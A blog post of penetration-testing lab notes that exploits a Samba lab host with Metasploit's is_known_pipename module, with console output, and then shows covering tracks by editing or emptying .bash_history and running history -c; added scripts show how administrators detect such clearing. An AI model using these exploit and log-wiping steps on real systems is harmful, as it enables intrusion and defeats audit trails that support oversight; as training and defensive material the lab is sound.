Clearing Your Tracks On Linux

Posted by r3kind1e on July 23, 2023

Clearing Your Tracks On Linux

Demo: Clearing Your Tracks On Linux

If you are transferring files onto a Linux target system, transfer them into the /tmp directory. Furthermore, if you are using the Metasploit Framework for exploitation and post-exploitation, keep an eye on the artifacts generated by those modules and identify where they are stored. When a Metasploit exploit or post-exploitation module provides a clean-up resource script, note where that script is stored, so that when you reach the final phase of post-exploitation you know where it is and can run it on the target system to undo what you did, or what that particular exploit or post-exploitation module did.

Kali Linux : 192.143.174.2

Target IP Address : 192.143.174.3

nmap -sV -p 445 192.143.174.3

msfconsole -q
setg RHOSTS 192.143.174.3
search samba
use exploit/linux/samba/is_known_pipename
show options
exploit

This should provide us with a non-interactive command shell session, which we can then upgrade to a semi-interactive bash session.

/bin/bash -i

In this case, we gain access to the target system with root privileges, which means we do not need to elevate our privileges.

Now that that is done, we can explore the first guideline or best practice: whenever you transfer files onto a Linux system, always store them within one centralized directory, and on Linux the best choice is the /tmp directory.

cd ~
ls
cd /
ls -al
cd /tmp
ls

Keep in mind that the /tmp directory behaves the same way on both Windows and Linux: once the system is restarted, all files within /tmp are deleted. While I do encourage you to transfer files to the /tmp directory, be aware that if you are performing a penetration test over a couple of days to a couple of weeks, whatever files you have transferred into /tmp will be deleted once the system is rebooted. Keep that in mind; it is also a good thing, because no traces or artifacts that you have used or transferred to the target system can then be found.

If we wanted to upload a file to this directory, we could either use the manual technique of setting up a web server and fetching the file with the wget utility, or upgrade this command shell session into a Meterpreter session and upload files directly using the upload command that Meterpreter provides.

Next are the Metasploit Framework exploit and post-exploitation modules and the artifacts they generate. What I want to point out is that most of these modules generate quite a few artifacts, and in the case of Linux there may be issues cleaning them up, so you may need to clean them up manually instead of relying on the resource scripts.

Let’s talk about Linux-specific techniques. One of the cool things with Linux

cd ~
ls
ls -al


.bashrc is a specific filename used in Unix and Unix-like systems to configure the behavior and environment variables of the Bash shell. Bash (Bourne Again SHell) is the default command-line shell for many Linux and macOS systems.

When a user logs into a Bash shell, the .bashrc file is executed. It contains a series of Bash commands and settings used to customize the user’s shell environment. These settings can include custom command aliases, environment variables, path configurations, function definitions, and more. Users can add their personalized configurations to the .bashrc file, ensuring they take effect every time they open a terminal.

It’s worth noting that filenames starting with a dot (.) are typically considered hidden files in the file system, meaning they won’t be displayed by default in file browsers. To view or edit the .bashrc file, you can use a text editor like nano, vim, or gedit within the terminal.

Here’s a simple example of a .bashrc file with some common configurations:

# Set custom command aliases
alias ll='ls -alF'
alias c='clear'

# Set environment variables
export JAVA_HOME=/path/to/java
export PATH=$JAVA_HOME/bin:$PATH
export EDITOR=nano

# Customize the prompt
PS1="\[\e[32m\]\u@\h:\w\$\[\e[0m\] "

This is just a basic example, and .bashrc files can be much more complex with a wide range of settings and configurations tailored to individual needs. It’s important to understand the purpose and implications of each setting before modifying the .bashrc file to avoid any unintended issues.

“Tailored to” is a common expression meaning “custom-made according to…” or “suited to…”. In the context of the .bashrc file, it means that the configuration in the file is customized according to personal needs and preferences, to satisfy the user’s specific requirements and tastes.

In other words, the settings in the .bashrc file can be adjusted to each user’s preferences and working habits, so that the user feels more comfortable and efficient when using the Bash shell. Different users may have different needs, so they can add or modify configuration in .bashrc to fit their own workflow and goals.

“Implications” refers to the consequences, effects or significance that an action, decision, event or situation may bring about. In the answer above, “implications” is used to say that before modifying the .bashrc file you should understand the meaning of each setting and the effects it may have.

Specifically, when you modify the .bashrc file, each setting and configuration item may influence the system’s behavior: it may affect your shell environment, command-line operation, script execution and other related aspects. If you do not understand what each setting means and does, you may get unexpected results, or even unstable or incorrect system behavior.

Therefore, before modifying .bashrc or any other configuration file, it is advisable to read the documentation and reference material carefully, or consult a professional, to make sure your changes are sensible, behave as expected and have no adverse consequences. Being familiar with the meaning and potential impact of each setting will help you make informed decisions, so that your system and working environment stay stable and effective.

.bashrc, which is a configuration file for bash. It stipulates how bash should work.

In this sentence, “stipulate” means to specify explicitly or to lay down specific details. It emphasizes that the .bashrc file explicitly specifies how Bash works.

In other words, .bashrc, as a configuration file, specifies in detail how the Bash shell should operate, including defining command aliases, setting environment variables, customizing the prompt and so on. By modifying .bashrc, you explicitly specify Bash’s behavior and environment, ensuring that your personal configuration is applied correctly every time you log in to a Bash shell.

So, in this sentence, “stipulate” emphasizes the role of the .bashrc file in concretely specifying Bash’s settings and behavior.

On most Linux systems you will typically find a bash history file, .bash_history. That file stores a history of all the commands you have typed into bash since the system was installed, and it can be limited or customized to keep only the commands typed over the last week or month. System administrators typically use it as a security mechanism to see what users have been doing. Every user account has a bash history file within its home directory.

cat /etc/passwd
uname -r

You can access or view the history of commands that you’ve typed in for the root user within your current session.

history

It displays a list of commands that I’ve entered chronologically from the time I logged in.


The history command is used to display the command history of the current user in a Bash shell. It shows a list of previously executed commands, each with a corresponding number, starting from the earliest command executed and incrementing with each subsequent command.

When you enter history in the terminal and press the Enter key, the Bash shell will display a list of command history in chronological order. Typically, these command histories are stored in a specific history file (often named .bash_history) located in the user’s home directory. The history is automatically saved to this file each time the user logs out, so it is available for future sessions.

The output might look something like this:

  1  ls
  2  cd Documents
  3  touch file.txt
  4  cp file.txt backup/
  5  cat file.txt
  6  nano script.sh
  ...

In this example, the user executed a series of commands in the past, and each command is preceded by a number. These numbers can be used with the ! (exclamation mark) to execute specific historical commands. For instance, if you want to re-execute the command with number 3 (touch file.txt), you can use the following command:

!3

This will immediately execute the command with number 3 without having to retype it. The history command is useful for reviewing previously executed commands, finding specific commands in history, or re-executing past commands efficiently. It can be a helpful tool for users to navigate and optimize their command-line experience.

“Chronological” is an adjective meaning arranged in time order, in the sequence in which events occurred. In the answer above, “chronological order” means ordered by the time at which the commands were executed.

When we say “command history in chronological order”, we mean that the command history is displayed in the order in which the commands were executed, from the earliest to the most recent. This ordering lets the user see clearly the sequence in which commands were run, which helps when reviewing past operations or looking for a specific command.

“Preceded” is the past tense and past participle of the verb “precede”. “Precede” means to happen or appear before something, or to be positioned in front of something.

In the answer above, “preceded” means that a number is placed in front of each command, so that the number appears earlier in the listing. Each command is displayed after its number, that is, the entries are shown one by one in numbered order. The number is the command’s position in the history, which lets the user quickly find and execute a specific historical command by its number.

ls -al

A good measure, or rather technique, to use, and this is not important in the context of a pentest, is to delete specific commands from the bash history file: commands that you typed in, or that may indicate to an administrator that the system has been compromised.

Instead of deleting the entire contents of the bash history file, I would always recommend that you delete only the specific commands that you typed in; that way it doesn’t look like someone has cleared it.

nano
vim

touch .bash_history
ls -al
history
echo "1 cd /tmp" > .bash_history
cat .bash_history

There are two ways of clearing the bash history: you can go in and delete the individual lines or commands that you typed in, or you can run the history -c command to clear the history.

history -c


The command history -c is used in a Bash shell to clear the command history.

When you enter history -c in the terminal and press the Enter key, the Bash shell will immediately clear the command history for the current user. This means that all previously executed commands will be removed from the history, and you won’t be able to view or re-execute them using the history command.

It’s essential to understand that history -c only clears the command history for the current session. It does not affect any history file where command history is typically stored (such as the .bash_history file in the user’s home directory). The command history file will remain intact, and any new commands executed after running history -c will still be saved to the history file.

It’s important to use history -c with caution because once the history is cleared, there’s no way to recover the previously executed commands. This command can be helpful in certain situations, such as when you want to clear the history before leaving a shared computer to remove any sensitive information from being visible in the history. However, it’s generally not recommended to use this command frequently, as having a command history can be beneficial for recalling and reusing previously executed commands.
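Both points made above, that every user has a .bash_history file which administrators read as an audit trail, and that history -c empties only the current session’s in-memory list while the file keeps whatever was already written, can be watched directly by driving a throwaway bash session. The script below is an added example written for this page; it is not part of the original post or the course material. It uses a temporary HISTFILE from mktemp so the real ~/.bash_history is never touched, and relies only on bash’s own history builtins (history -s, -a, -c) and the HISTTIMEFORMAT variable, which makes bash store a "#<epoch>" line before each command. The history_timeline function is a small awk parser of that file format, written for this example (it is not a standard tool), of the kind an administrator or responder would use to turn a timestamped history file into a timeline.

```shell
#!/bin/sh
# Added example for this page (not from the original post). Shows what actually
# lands in a bash history file, and when, using a temporary HISTFILE so the
# real ~/.bash_history is never touched.

# simulate_session HISTFILE
# Drives a scripted bash with HISTTIMEFORMAT set, so every entry is written as
# a "#<epoch>" line followed by the command. history -s adds an entry exactly
# as typing it in an interactive shell would, so the builtins are enough here.
simulate_session() {
    bash --norc --noprofile -c '
        HISTFILE=$1
        HISTSIZE=500 HISTFILESIZE=500
        unset HISTCONTROL HISTIGNORE   # nothing inherited may filter entries
        HISTTIMEFORMAT="%F %T "        # when set, bash writes timestamps too
        shopt -s histappend            # interactive shells then append at exit
        history -s "cd /tmp"           # -s: record an entry as if typed
        history -s "ls -al"
        history -a                     # -a: append not-yet-written entries
        history -s "cat /etc/passwd"
        history -c                     # -c: empty the in-memory list only
        history -s "exit"
        history -a                     # only "exit" is new, so only it is written
    ' demo "$1"
}

# history_timeline HISTFILE
# Pairs each "#<epoch>" line with the command that follows it and prints
# "<epoch><TAB><command>"; a command with no timestamp gets "?" instead.
history_timeline() {
    awk '
        /^#[0-9]+$/ { ts = substr($0, 2); next }
        { printf "%s\t%s\n", (ts == "" ? "?" : ts), $0; ts = "" }
    ' "$1"
}

# commands_in HISTFILE: just the recorded commands, one per line.
commands_in() {
    history_timeline "$1" | cut -f2
}

# Stand-alone run: build the file, show both views, clean up.
demo_file=$(mktemp)
simulate_session "$demo_file"
echo "history file as written by bash:"
cat "$demo_file"
echo "reconstructed timeline:"
history_timeline "$demo_file"
rm -f "$demo_file"
```

Running it prints three commands: cd /tmp and ls -al were appended by the first history -a, and exit by the second; cat /etc/passwd never reaches the file because history -c dropped it before it was written. That is exactly the split the demo sessions below show, where history -c empties what history prints but cat .bash_history still returns the earlier lines.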

history

ls -al
cat /etc/passwd
history

exit
exit
exploit
/bin/bash -i
history

history -c
exit
exit
exploit
/bin/bash -i
history

cd /root
ls -al
cat .bash_history

cat /dev/null > .bash_history


The command cat /dev/null > .bash_history is used to clear the contents of the user’s Bash command history file (typically named .bash_history).

Let’s break down the command:

  1. cat: This is a command used to concatenate and display the contents of a file. In this command, cat is used to process the .bash_history file.

  2. /dev/null: In Unix and Unix-like systems, /dev/null is a special device file that discards all data written to it without doing anything with the data. Writing data to /dev/null is equivalent to discarding the data, and it won’t be saved anywhere.

  3. >: This is the output redirection operator, used to redirect the output of a command to a file. In this context, it redirects the output from /dev/null to the .bash_history file.

Putting it all together, the command cat /dev/null > .bash_history means: take the data from /dev/null (which is empty), and write it to the .bash_history file, effectively clearing the contents of .bash_history.

After executing this command, the .bash_history file will be empty, and all previously recorded command history will be removed. It’s important to note that this command only clears the .bash_history file; it does not affect the current Bash session’s command history. Any new commands executed after running this command will still be added to the .bash_history file unless you run the command again to clear it once more.

Please exercise caution while using this command because once executed, the command history will be permanently cleared, and there’s no way to recover the previously recorded commands unless you have a backup of the .bash_history file.
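Seen from the administrator’s side, the commands described in this section leave a recognisable state behind: a .bash_history that is missing, zero bytes long (what cat /dev/null > .bash_history produces), or one that cannot record anything at all, and shell start-up files that switch history off. The script below is an added example written for this page, not part of the original post or of any standard tool, that audits every home directory under a given root for those conditions. The home directories and dotfiles it creates under mktemp -d are constructed sample data, so it runs offline and never reads a real /home.

```shell
#!/bin/sh
# Added example for this page (not from the original post): an administrator-
# side audit of bash history state across home directories. Prints one
# "<user><TAB><finding>" line per finding; a normal home produces no output.

# Settings in shell start-up files that turn history off or make it useless.
HIST_DISABLE_RE='HISTFILE=/dev/null|HISTSIZE=0|HISTFILESIZE=0|unset[[:space:]]+HISTFILE|set[[:space:]]+\+o[[:space:]]+history'

# audit_histories ROOT   (ROOT holds one directory per user, like /home)
audit_histories() {
    for home in "$1"/*; do
        [ -d "$home" ] || continue
        user=${home##*/}
        hf="$home/.bash_history"
        if [ -L "$hf" ]; then
            # a symlinked history file holds no record of its own
            printf '%s\thistory_is_symlink:%s\n' "$user" "$(readlink "$hf")"
        elif [ ! -e "$hf" ]; then
            # only meaningful when the account actually uses bash
            if [ -e "$home/.bashrc" ]; then
                printf '%s\tmissing_history_file\n' "$user"
            fi
        elif [ ! -s "$hf" ]; then
            # zero bytes: what "cat /dev/null > .bash_history" leaves behind
            printf '%s\tempty_history_file\n' "$user"
        fi
        for rc in .bashrc .bash_profile .profile; do
            if [ -f "$home/$rc" ] && grep -Eq "$HIST_DISABLE_RE" "$home/$rc"; then
                printf '%s\thistory_disabled_in:%s\n' "$user" "$rc"
            fi
        done
    done
    return 0
}

# build_sample_homes ROOT: constructed sample data, not from any real system.
build_sample_homes() {
    for u in alice bob carol dave erin; do
        mkdir -p "$1/$u"
        printf 'alias ll="ls -alF"\n' > "$1/$u/.bashrc"
    done
    printf 'cd /tmp\nls -al\n' > "$1/alice/.bash_history"   # ordinary user
    : > "$1/bob/.bash_history"                               # truncated to zero bytes
    # carol: no .bash_history at all
    ln -s /dev/null "$1/dave/.bash_history"                  # symlink, records nothing
    printf 'cd /tmp\n' > "$1/erin/.bash_history"
    printf 'export HISTFILESIZE=0\n' >> "$1/erin/.bashrc"    # history disabled in profile
}

# Stand-alone run on the constructed sample.
root=$(mktemp -d)
build_sample_homes "$root"
audit_histories "$root"
rm -rf "$root"
```

On the sample data alice produces nothing, while bob, carol, dave and erin each produce one finding. Pointing audit_histories at /home on a real host gives the same report; an absent or empty file by itself is only a lead, since a freshly created account looks the same, so the file’s modification time and the user’s login records are the next things to compare it against.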

In the answer above, “concatenate” is a verb meaning to join several objects or elements together into one whole. In computing, “concatenate” is often used for joining several text strings or file contents together into one longer string or file.

In the command cat /dev/null > .bash_history above, the cat command is by design used to concatenate and display file contents; here, however, /dev/null is a special device file that has no actual content. Using /dev/null as the input file for cat is really a way of obtaining empty content, which the output redirection (>) then writes into the .bash_history file, thereby clearing the command history.

To sum up, in this context “concatenate” means joining empty content into the .bash_history file, which has the effect of clearing the command history.

In the answer above, “discard” is a verb meaning to throw away or give up something, that is, to stop using or keeping it. In computing, “discard” usually refers to deleting, dropping or no longer processing data or information.

In the command cat /dev/null > .bash_history above, we use /dev/null as the input file because /dev/null is a special device file: data written to it is dropped directly and is neither kept nor processed by the system. So one can say that this command writes data (empty content) to the /dev/null device file, achieving the effect of discarding the data.

Therefore, in this command, “discard” refers to dropping or clearing the command history in the .bash_history file so that it is no longer kept. By writing empty content into .bash_history, we discard the previous command history and thereby empty the file.

history
history -c
history

cat .bash_history

That is how to clear the bash history.

Clearing Your Tracks On Linux

Overview

Goal

This lab covers the process of clearing your tracks on a Linux system.

Reproducing the video content

Kali Linux : 192.123.118.2

Target IP Address : 192.123.118.3

root@attackdefense:~# nmap -sV -p 445 192.123.118.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-07-23 02:49 UTC
Nmap scan report for target-1 (192.123.118.3)
Host is up (0.000060s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:42:C0:7B:76:03 (Unknown)
Service Info: Host: VICTIM-1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.48 seconds

root@attackdefense:~# msfconsole -q
msf5 > setg RHOSTS 192.123.118.3
RHOSTS => 192.123.118.3
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          192.123.118.3    yes       The target address range or CIDR identifier
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.123.118.3:445 - Using location \\192.123.118.3\exploitable\tmp for the path
[*] 192.123.118.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.123.118.3:445 - Share 'exploitable' has server-side path '/
[*] 192.123.118.3:445 - Uploaded payload to \\192.123.118.3\exploitable\tmp\aaRuqPMQ.so
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/aaRuqPMQ.so using \\PIPE\/tmp/aaRuqPMQ.so...
[-] 192.123.118.3:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/aaRuqPMQ.so using /tmp/aaRuqPMQ.so...
[+] 192.123.118.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.123.118.2:38583 -> 192.123.118.3:445) at 2023-07-23 02:51:58 +0000

/bin/bash -i
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:/tmp# cd ~
cd ~
root@victim-1:/root# ls
ls
start.sh
root@victim-1:/root# cd /
cd /
root@victim-1:/# ls -al
ls -al
total 19164
drwxr-xr-x   1 root   root        4096 Jul 23 02:47 .
drwxr-xr-x   1 root   root        4096 Jul 23 02:47 ..
-rwxr-xr-x   1 root   root           0 Jul 23 02:47 .dockerenv
drwxr-xr-x   1 root   root        4096 Oct  8  2018 bin
drwxr-xr-x   2 root   root        4096 Jun 14  2018 boot
drwxr-xr-x   5 root   root         340 Jul 23 02:47 dev
drwxr-xr-x   1 root   root        4096 Jul 23 02:47 etc
drwxr-xr-x   1 root   root        4096 Oct  8  2018 home
drwxr-xr-x   1 root   root        4096 Oct  8  2018 lib
drwxr-xr-x   2 root   root        4096 Aug 31  2018 lib64
drwxr-xr-x   2 root   root        4096 Aug 31  2018 media
drwxr-xr-x   2 root   root        4096 Aug 31  2018 mnt
drwxr-xr-x   2 root   root        4096 Aug 31  2018 opt
dr-xr-xr-x 643 nobody nogroup        0 Jul 23 02:47 proc
drwx------   1 root   root        4096 Oct  8  2018 root
drwxr-xr-x   1 root   root        4096 Jul 23 02:47 run
drwxr-xr-x   1 root   root        4096 Oct  8  2018 samba-4.1.17
-rw-r--r--   1 root   root    19536407 Feb 23  2015 samba-4.1.17.tar.gz
drwxr-xr-x   1 root   root        4096 Oct  8  2018 sbin
drwxr-xr-x   2 root   root        4096 Aug 31  2018 srv
dr-xr-xr-x  13 nobody nogroup        0 Jul 23 02:47 sys
drwxrwxrwt   1 root   root        4096 Jul 23 02:51 tmp
drwxr-xr-x   1 root   root        4096 Aug 31  2018 usr
drwxr-xr-x   1 root   root        4096 Aug 31  2018 var
root@victim-1:/# cd /tmp
cd /tmp
root@victim-1:/tmp# ls
ls

root@victim-1:/tmp# cd ~
cd ~
root@victim-1:/root# ls
ls
start.sh
root@victim-1:/root# ls -al
ls -al
total 32
drwx------ 1 root root 4096 Oct  8  2018 .
drwxr-xr-x 1 root root 4096 Jul 23 02:47 ..
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4096 Oct  8  2018 .docker
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ecryptfs
-rw-r--r-- 1 root root  140 Nov 19  2007 .profile
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ssh
-rwxr-xr-x 1 root root   57 Oct  8  2018 start.sh

root@victim-1:/root# cat /etc/passwd
root@victim-1:/root# uname -r
uname -r
5.4.0-152-generic

root@victim-1:/root# history
history
    1  cd ~
    2  ls
    3  cd /
    4  ls -al
    5  cd /tmp
    6  ls
    7  cd ~
    8  ls
    9  ls -al
   10  cat /etc/passwd
   11  uname -r
   12  history

root@victim-1:/root# ls -al
ls -al
total 32
drwx------ 1 root root 4096 Oct  8  2018 .
drwxr-xr-x 1 root root 4096 Jul 23 02:47 ..
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4096 Oct  8  2018 .docker
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ecryptfs
-rw-r--r-- 1 root root  140 Nov 19  2007 .profile
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ssh
-rwxr-xr-x 1 root root   57 Oct  8  2018 start.sh
root@victim-1:/root# touch .bash_history 
touch .bash_history
root@victim-1:/root# ls -al
ls -al
total 32
drwx------ 1 root root 4096 Jul 23 03:12 .
drwxr-xr-x 1 root root 4096 Jul 23 02:47 ..
-rw-rw-rw- 1 root root    0 Jul 23 03:12 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4096 Oct  8  2018 .docker
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ecryptfs
-rw-r--r-- 1 root root  140 Nov 19  2007 .profile
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ssh
-rwxr-xr-x 1 root root   57 Oct  8  2018 start.sh
root@victim-1:/root# cat .bash_history
cat .bash_history

root@victim-1:/root# history
history
    1  cd ~
    2  ls
    3  cd /
    4  ls -al
    5  cd /tmp
    6  ls
    7  cd ~
    8  ls
    9  ls -al
   10  cat /etc/passwd
   11  uname -r
   12  history
   13  ls -al
   14  touch .bash_history
   15  ls -al
   16  cat .bash_history
   17  histroy
   18  history
root@victim-1:/root# history -c
history -c
root@victim-1:/root# history
history
    1  history
root@victim-1:/root# cat .bash_history
cat .bash_history

root@victim-1:/root# ls -al
root@victim-1:/root# cat /etc/passwd
root@victim-1:/root# history
history
    1  history
    2  cat .bash_history
    3  ls -al
    4  cat /etc/passwd
    5  history
root@victim-1:/root# cat .bash_history
cat .bash_history

root@victim-1:/root# ^C
Abort session 1? [y/N]  y
""

[*] 192.123.118.3 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.123.118.3:445 - Using location \\192.123.118.3\exploitable\tmp for the path
[*] 192.123.118.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.123.118.3:445 - Share 'exploitable' has server-side path '/
[*] 192.123.118.3:445 - Uploaded payload to \\192.123.118.3\exploitable\tmp\XTJGWwhn.so
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/XTJGWwhn.so using \\PIPE\/tmp/XTJGWwhn.so...
[-] 192.123.118.3:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/XTJGWwhn.so using /tmp/XTJGWwhn.so...
[+] 192.123.118.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 2 opened (192.123.118.2:43799 -> 192.123.118.3:445) at 2023-07-23 03:19:38 +0000

/bin/bash -i
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:/tmp# history
history
    1  history
    2  cat .bash_history
    3  ls -al
    4  cat /etc/passwd
    5  history
    6  cat .bash_history
    7  history
root@victim-1:/tmp# cd ~ 
cd ~
root@victim-1:/root# cat .bash_history
cat .bash_history
history
cat .bash_history
ls -al
cat /etc/passwd
history
cat .bash_history

root@victim-1:/root# history -c
history -c
root@victim-1:/root# exit
exit
exit
exit
[*] 192.123.118.3 - Command shell session 2 closed.

msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.123.118.3:445 - Using location \\192.123.118.3\exploitable\tmp for the path
[*] 192.123.118.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.123.118.3:445 - Share 'exploitable' has server-side path '/
[*] 192.123.118.3:445 - Uploaded payload to \\192.123.118.3\exploitable\tmp\JRaClgTN.so
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/JRaClgTN.so using \\PIPE\/tmp/JRaClgTN.so...
[-] 192.123.118.3:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/JRaClgTN.so using /tmp/JRaClgTN.so...
[+] 192.123.118.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 3 opened (192.123.118.2:39651 -> 192.123.118.3:445) at 2023-07-23 03:21:58 +0000

/bin/bash -i
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:/tmp# history
history
    1  history
    2  cat .bash_history
    3  ls -al
    4  cat /etc/passwd
    5  history
    6  cat .bash_history
    7  exit
    8  history
root@victim-1:/tmp# cd ~
cd ~
root@victim-1:/root# cat .bash_history
cat .bash_history
history
cat .bash_history
ls -al
cat /etc/passwd
history
cat .bash_history
exit

root@victim-1:/root# history -c
history -c
root@victim-1:/root# history
history
    1  history
root@victim-1:/root# cat .bash_history
cat .bash_history
history
cat .bash_history
ls -al
cat /etc/passwd
history
cat .bash_history
exit

root@victim-1:/root# cat /dev/null > .bash_history
cat /dev/null > .bash_history
root@victim-1:/root# cat .bash_history
cat .bash_history
root@victim-1:/root# history
history
    1  history
    2  cat .bash_history
    3  cat /dev/null > .bash_history
    4  cat .bash_history
    5  history

root@victim-1:/root# history -c
history -c
root@victim-1:/root# history
history
    1  history
root@victim-1:/root# cat .bash_history
cat .bash_history